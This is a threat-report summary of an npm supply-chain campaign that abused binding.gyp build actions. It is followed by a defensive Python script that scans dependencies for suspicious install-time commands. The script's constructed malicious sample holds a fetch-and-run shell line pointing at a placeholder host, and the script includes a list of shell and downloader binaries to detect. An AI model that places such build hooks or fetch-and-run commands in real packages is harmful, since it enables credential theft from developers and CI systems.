Supply Chain Attack Hits Dozens of npm Packages via binding.gyp
ID: f3c39696-450e-5880-8c85-3cedb111bed0
STIX ID: report--f3c39696-450e-5880-8c85-3cedb111bed0
Feed Name: GBHackers
On 2026-06-03 a coordinated npm supply-chain campaign (attributed to a Miasma worm variant) rapidly pushed malicious updates to dozens of high-impact packages using a novel "Phantom Gyp" technique that abuses binding.gyp to trigger node-gyp and execute hidden payloads. The multi-stage malware obfuscates payloads, deploys the Bun runtime to evade detection, harvests secrets from CI runners and cloud/local credential stores, and exfiltrates data to attacker-controlled GitHub repos (account: liuende501); indicators include multiple SHA-256 file hashes, Bun download patterns, and C2 repository paths. Organizations should audit dependencies, monitor build-time activity, rotate exposed tokens, and deploy runtime protections capable of detecting non-traditional execution vectors.
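The build-time vector summarised above works because node-gyp will run whatever `actions` a package declares in its `binding.gyp` during install. The following audit script is an added example for the "audit dependencies" recommendation; it is not code from GBHackers, the report, or the campaign. It walks a `node_modules` tree, parses each `binding.gyp` (a Python-style dict literal), and reports actions that invoke a shell, a downloader, the Bun runtime, or inline `node -e`, plus install-time lifecycle scripts in `package.json` that reference Bun or a URL. The command list, the placeholder URL and both sample `binding.gyp` files are constructed for this example; it only inspects top-level `targets` and ignores targets nested under gyp `conditions`.

```python
"""Audit binding.gyp build actions and install hooks for non-build commands.

Added example: heuristic detection for packages that abuse node-gyp 'actions'
to run arbitrary commands at install time. Lists and thresholds are assumptions.
"""
import ast
import json
import re
from pathlib import Path

# Binaries a native compile step has no reason to invoke (assumed list).
NON_BUILD_CMDS = {"sh", "bash", "zsh", "cmd", "cmd.exe", "powershell",
                  "pwsh", "curl", "wget", "bun", "bunx"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
BUN_RE = re.compile(r"\bbunx?\b", re.IGNORECASE)


def parse_gyp(text: str) -> dict:
    """binding.gyp is a Python-style dict literal ('#' comments, trailing commas)."""
    return ast.literal_eval(text)


def audit_gyp(gyp: dict) -> list:
    """Return one finding per suspicious action in the top-level targets."""
    findings = []
    for target in gyp.get("targets", []):
        for action in target.get("actions", []):
            cmd = [str(c) for c in action.get("action", [])]
            if not cmd:
                continue
            exe = Path(cmd[0]).name.lower()
            joined = " ".join(cmd)
            reasons = []
            if exe in NON_BUILD_CMDS:
                reasons.append(f"invokes {exe}")
            if URL_RE.search(joined):
                reasons.append("embeds a URL")
            if exe in {"node", "node.exe"} and any(a in ("-e", "--eval") for a in cmd[1:]):
                reasons.append("inline JavaScript eval")
            if BUN_RE.search(joined):
                reasons.append("references the Bun runtime")
            if reasons:
                findings.append({
                    "target": target.get("target_name", "<unnamed>"),
                    "action": action.get("action_name", "<unnamed>"),
                    "command": joined,
                    "reasons": reasons,
                })
    return findings


def audit_package_json(text: str) -> list:
    """Flag install-time lifecycle scripts that reference Bun or fetch from a URL.
    A plain 'node-gyp rebuild' install script is the normal pattern and is not flagged."""
    scripts = json.loads(text).get("scripts", {})
    hooks = ("preinstall", "install", "postinstall", "prepare")
    return [
        {"script": h, "command": scripts[h]}
        for h in hooks
        if h in scripts and (BUN_RE.search(scripts[h]) or URL_RE.search(scripts[h]))
    ]


def scan_node_modules(root: Path) -> dict:
    """Walk every binding.gyp under root/node_modules and collect findings per package."""
    report = {}
    for gyp_path in root.glob("node_modules/**/binding.gyp"):
        pkg_dir = gyp_path.parent
        findings = audit_gyp(parse_gyp(gyp_path.read_text()))
        pj = pkg_dir / "package.json"
        if pj.exists():
            findings += audit_package_json(pj.read_text())
        if findings:
            report[str(pkg_dir.relative_to(root))] = findings
    return report


# Constructed samples (not from the campaign): an ordinary addon and an abusive one.
BENIGN_GYP = """
{
  'targets': [{
    'target_name': 'addon',
    'sources': ['src/addon.cc'],
    'actions': [{
      'action_name': 'gen_version_header',   # ordinary codegen step
      'inputs': ['tools/gen.py'],
      'outputs': ['<(SHARED_INTERMEDIATE_DIR)/version.h'],
      'action': ['python', 'tools/gen.py', '<@(_outputs)'],
    }],
  }],
}
"""
PHANTOM_GYP = """
{
  'targets': [{
    'target_name': 'addon',
    'sources': ['src/empty.cc'],
    'actions': [{
      'action_name': 'prepare',
      'inputs': [],
      'outputs': ['<(SHARED_INTERMEDIATE_DIR)/ok'],
      'action': ['sh', '-c', 'curl -fsSL https://placeholder.invalid/i.sh | sh; bun run stage2.js'],
    }],
  }],
}
"""

if __name__ == "__main__":
    print(audit_gyp(parse_gyp(BENIGN_GYP)))  # no findings
    for f in audit_gyp(parse_gyp(PHANTOM_GYP)):
        print(f["target"], f["action"], f["reasons"])
```

Run `scan_node_modules(Path("."))` from a project root to get a per-package report; treat any hit as a reason to pin the package to a known-good version and review the build steps by hand, since a legitimate addon can also use `actions` for code generation.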
